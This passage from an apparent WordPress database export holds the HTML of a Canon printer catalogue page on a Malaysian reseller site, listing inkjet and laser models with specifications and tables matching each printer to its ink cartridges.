width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr></tbody></table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2019-09-24 15:35:20','2019-09-24 07:35:20','',1449,'https://bintara.com.my/blog/2019/09/24/1449-revision-v1/',0,'revision','',0),(3294,1,'2019-09-24 15:38:15','2019-09-24 07:38:15','<h2>Injet Printers :-</h2>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto DuplexÂ Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><p>Â </p><p>Â </p><center>[maxbutton id=\"11\" ]</center><p>Â </p>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><p>Â </p><p>Â </p><p>Â </p><center></center><center><br />[maxbutton id=\"11\" ]</center><p>Â </p>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><p>&lt;center&gt;[maxbutton id=\"11\" ]&lt;/center&gt;</p>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h3>Laser Printers :-</h3>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<h4>Compact with wireless connectivity</h4><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Printing</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 43ppm</li><li>Recommended monthly print volume: 2,000 - 7,500 pages</li><li>FPOT: 6.2secs. (A4)</li><li>Max. paper input capacity: Up to 2,300 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 38ppm</li><li>Recommended monthly print volume: 750 - 4,000 pages</li><li>FPOT: 5.5secs. (A4)</li><li>Max. paper input capacity: Up to 900 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h3>Cartridge Printers :-</h3>		\n		<table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>imagePROGRAF PRO-500</p></td><td width=\"208\"><p>Maintenance Cartridge MC-20</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY iB4170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5070</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5370</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5470</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA E3170</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E410</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA E4270</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E470</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E477</p></td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E480</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E510</p></td><td width=\"208\"><p>CL-98 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-88 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560 / E560R</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G2010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G4010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP100</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110 (with battery)</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP1300</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2770 / iP2772</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2870S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td 